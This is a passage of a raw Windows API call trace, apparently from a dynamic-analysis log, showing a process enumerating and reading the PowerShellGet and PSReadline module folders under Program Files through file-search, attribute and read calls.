0xffffffff [0140.506] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0xb156f8d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0140.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.507] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0xb156f8de20 | out: lpFileInformation=0xb156f8de20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0140.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.507] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0xb156f8d870, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0140.507] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0xb156f8daa0 | out: lpFindFileData=0xb156f8daa0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a24e0 [0140.507] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.508] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0140.508] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.508] FindClose (in: hFindFile=0x1e3371a24e0 | out: hFindFile=0x1e3371a24e0) returned 1 [0140.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.508] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0xb156f8d960, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0140.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ddb0) returned 1 [0140.508] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8de90 | out: lpFileInformation=0xb156f8de90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4)) returned 1 [0140.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd70) returned 1 [0140.509] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0xb156f8d670, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0140.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8db50) returned 1 [0140.509] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6fc [0140.509] GetFileType (hFile=0x6fc) returned 0x1 [0140.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dac0) returned 1 [0140.509] GetFileType (hFile=0x6fc) returned 0x1 [0140.509] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e339318ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e339318ea0*, lpNumberOfBytesRead=0xb156f8dc28*=0x1000, lpOverlapped=0x0) returned 1 [0140.511] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e339318ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e339318ea0*, lpNumberOfBytesRead=0xb156f8dc28*=0x1000, lpOverlapped=0x0) returned 1 [0140.511] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e339318ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e339318ea0*, lpNumberOfBytesRead=0xb156f8dc28*=0x1000, lpOverlapped=0x0) returned 1 [0140.511] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e339318ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e339318ea0*, lpNumberOfBytesRead=0xb156f8dc28*=0x1000, lpOverlapped=0x0) returned 1 [0140.512] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e339318ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e339318ea0*, lpNumberOfBytesRead=0xb156f8dc28*=0x1000, lpOverlapped=0x0) returned 1 [0140.512] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e339318ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e339318ea0*, lpNumberOfBytesRead=0xb156f8dc28*=0xac4, lpOverlapped=0x0) returned 1 [0140.512] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e3393184a4, nNumberOfBytesToRead=0x13c, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e3393184a4*, lpNumberOfBytesRead=0xb156f8dc28*=0x0, lpOverlapped=0x0) returned 1 [0140.512] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e339318ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e339318ea0*, lpNumberOfBytesRead=0xb156f8dc28*=0x0, lpOverlapped=0x0) returned 1 [0140.512] CloseHandle (hObject=0x6fc) returned 1 [0140.514] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0140.514] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0140.514] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0140.514] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0140.514] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0140.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.515] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0xb156f8d810, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0140.515] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\*"), lpFindFileData=0xb156f8da40 | out: lpFindFileData=0xb156f8da40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.515] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.515] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0140.515] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.516] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.516] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0xb156f8d810, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0140.516] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\*"), lpFindFileData=0xb156f8da40 | out: lpFindFileData=0xb156f8da40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.516] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.517] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0140.517] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 0 [0140.517] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dba0) returned 1 [0140.517] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0xb156f8d680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0140.517] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\*"), lpFindFileData=0xb156f8d8b0 | out: lpFindFileData=0xb156f8d8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.518] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.518] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0140.518] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0140.519] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0140.519] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0140.519] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 0 [0140.519] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dad0) returned 1 [0140.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8da90) returned 1 [0140.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dba0) returned 1 [0140.520] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0xb156f8d680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0140.520] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\*"), lpFindFileData=0xb156f8d8b0 | out: lpFindFileData=0xb156f8d8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a29c0 [0140.520] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.520] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0140.521] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0140.521] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0140.521] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0140.521] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.521] FindClose (in: hFindFile=0x1e3371a29c0 | out: hFindFile=0x1e3371a29c0) returned 1 [0140.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dad0) returned 1 [0140.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8da90) returned 1 [0140.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8da10) returned 1 [0140.522] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0xb156f8d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0140.522] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\*"), lpFindFileData=0xb156f8d720 | out: lpFindFileData=0xb156f8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a29c0 [0140.522] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d6e0 | out: lpFindFileData=0xb156f8d6e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, 